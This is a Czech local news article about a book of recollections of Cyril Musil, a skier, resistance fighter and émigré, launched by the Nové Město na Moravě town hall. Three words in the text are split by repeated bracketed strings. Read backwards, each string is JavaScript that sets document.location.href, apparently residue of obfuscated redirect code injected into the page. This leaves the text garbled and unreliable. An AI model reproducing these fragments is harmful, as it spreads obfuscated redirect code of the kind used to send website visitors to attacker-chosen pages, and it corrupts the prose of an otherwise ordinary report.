Rainbow page separator

Na odbojáře Cyrila Musila vzpomínají pamětníci v nové knize

Pondělí, 5. června 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nová kniha s názvem Vzpomínky na Cyrila Musila au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torky Heleny Zelené Křížové bude ve středu 7. června v 16 hodin pokřtěna v novoměstském Horáckém muzeu.
Publikace, kterou nechala vydat novoměstská radnice, zahrnuje vzpomínky sestry, dcery a dalších pamětníků na lyžaře ze Studnic u Nového Města na Moravě, pozdějšího odbojáře provozujícího „partyzánský hotel“, ale následně také vězně, uprchlíka, emigranta a „nepřítele Československé socialistické republiky“.
„Chtěli jsme uctít osobnost Cyrila Musila, který se významně zapsal do dějin našeho regionu,“ uvedl novoměstský starosta Michal Šmarda s tím, že v dubnu uplynulo 40 let od Musilovy smrti a v lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu bude 110. výročí jeho narození, kdy radnice zároveň chystá vzpomínkovou akci.
Cyril Musil se narodil roku 1907 ve Studnicích u Nového Města na Moravě. Byl předním českým lyžařem, za okupace pak odbojářem. V roce 1949 byl zatčen STB a odsouzen ke dvaceti letům vězení. Z výkonu trestu v Ilavě se mu podařilo uprchnout a poté se přes Rakousko dostal do Kanady, kde žil až do své smrti v roce 1977. V roce 2007 získal in memoriam čestné občanství Nového Města na Moravě.